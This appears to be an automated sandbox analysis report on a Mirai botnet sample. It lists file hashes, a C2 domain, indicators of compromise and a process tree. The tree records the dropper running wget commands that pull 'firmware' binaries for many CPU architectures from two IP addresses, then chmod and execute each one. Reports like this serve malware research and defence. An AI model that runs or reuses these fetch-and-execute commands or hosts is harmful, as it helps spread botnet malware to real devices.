Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
176s -
max time network
178s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02/09/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Resource
debian9-mipsel-20240418-en
General
-
Target
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
-
Size
8KB
-
MD5
86311599eaaff9e71ddc72ada1b21c2e
-
SHA1
572f97e41071d072dfc97127454d4978b50a81e2
-
SHA256
85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
-
SHA512
74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
-
SSDEEP
96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7
Malware Config
Extracted
mirai
www.akck.ru
Signatures
-
Executes dropped EXE 9 IoCs
ioc pid Process /bin/feankzzyx 752 feankzzyx /bin/feankzzyx 756 feankzzyx /bin/feankzzyx 760 feankzzyx /bin/feankzzyx 764 feankzzyx /bin/feankzzyx 779 feankzzyx /bin/feankzzyx 797 feankzzyx /bin/feankzzyx 816 feankzzyx /bin/feankzzyx 825 feankzzyx /bin/feankzzyx 829 feankzzyx -
Writes file to system bin folder 1 TTPs 14 IoCs
description ioc Process File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/ALLAH_IS_EVIL.txt 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/firmware_v4?user=root&dir=%2Fbin wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/allah_is_satan 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx wget File opened for modification /bin/feankzzyx 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown File opened for modification /bin/current_user2 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself bs 829 feankzzyx -
Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems id File opened for reading /proc/filesystems sed File opened for reading /proc/sys/kernel/ngroups_max id
Processes
-
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown1⤵
- Writes file to system bin folder
PID:714 -
/usr/bin/idid2⤵
- Reads runtime system information
PID:717
-
-
/bin/sedsed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"2⤵
- Reads runtime system information
PID:718
-
-
/usr/bin/whoamiwhoami2⤵PID:725
-
-
/usr/bin/wgetwget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"2⤵
- Writes file to system bin folder
PID:728
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx2⤵
- Writes file to system bin folder
PID:739
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:751
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx2⤵
- Writes file to system bin folder
PID:754
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:755
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx2⤵
- Writes file to system bin folder
PID:758
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:759
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx2⤵
- Writes file to system bin folder
PID:762
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:763
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:764
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx2⤵
- Writes file to system bin folder
PID:766
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:777
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:779
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx2⤵
- Writes file to system bin folder
PID:782
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:795
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:797
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx2⤵
- Writes file to system bin folder
PID:800
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:815
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx2⤵
- Writes file to system bin folder
PID:819
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:824
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://45.159.211.121/firmware/firmware.mips -O feankzzyx2⤵
- Writes file to system bin folder
PID:827
-
-
/bin/chmodchmod 0755 ./feankzzyx2⤵PID:828
-
-
/bin/feankzzyx./feankzzyx2⤵
- Executes dropped EXE
- Changes its process name
PID:829
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
828B
MD5654d89fdcfd44330b80fc359d544adb9
SHA153ff7c283c7bab6b7071510349b7785e54da5454
SHA25643a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75
SHA512d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857
-
Filesize
15B
MD5640832e65d903e762b84b766ea39ed8e
SHA1a35a203fbae4b913edbd5f00cfc92fe076e39532
SHA25668bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b
SHA512f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b
-
Filesize
5B
MD574cc1c60799e0a786ac7094b532f01b1
SHA1552c0ba71b1046a083583ebf943cc9aa09f39a32
SHA25653175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a
SHA51221e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a
-
Filesize
10B
MD57d91028619a806f35dac54dd9f656276
SHA1ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e
SHA2568227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484
SHA5129a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956
-
Filesize
137KB
MD5bcae0ad478a4924fab82304db8203eed
SHA12e4c52e260bfdaab1f317860ce9455d7a80519e6
SHA2567e9239395e7fa0547d8782ecf1b6213ebdab113095406702fb076741f9e51907
SHA51273b3a42b595ee8a298ff5dd2ee466628d99ad58625cd3791e671bf91b61acb534dcdae0e87ed279f63b07af0460440b5dec263b3aa8a3bfc47db2925c86d3cc6
-
Filesize
4B
MD52a76ee31e49f38759ed046466b52a513
SHA1e31dcb09b650cd3ab532a902888c33da96f45c55
SHA2567ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f
SHA512e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9
-
Filesize
10B
MD561ef923b8276f307b7f125a9acc8f004
SHA137c300cd00115e00f1aff0d227fc6cd38de572b2
SHA2563b0aa99677bf9f40c322e3bccaa0e2079e7a99e5516562022c443465e8f9f56e
SHA512ea54b8caf3a95c08b132c8b3ba711cfbf992927d7c1d5463d9006b8003190891b2f8ea1302c68dae28c5f7fcdf7b2b7eefbafde9a3129e76e906eea63d5c84ea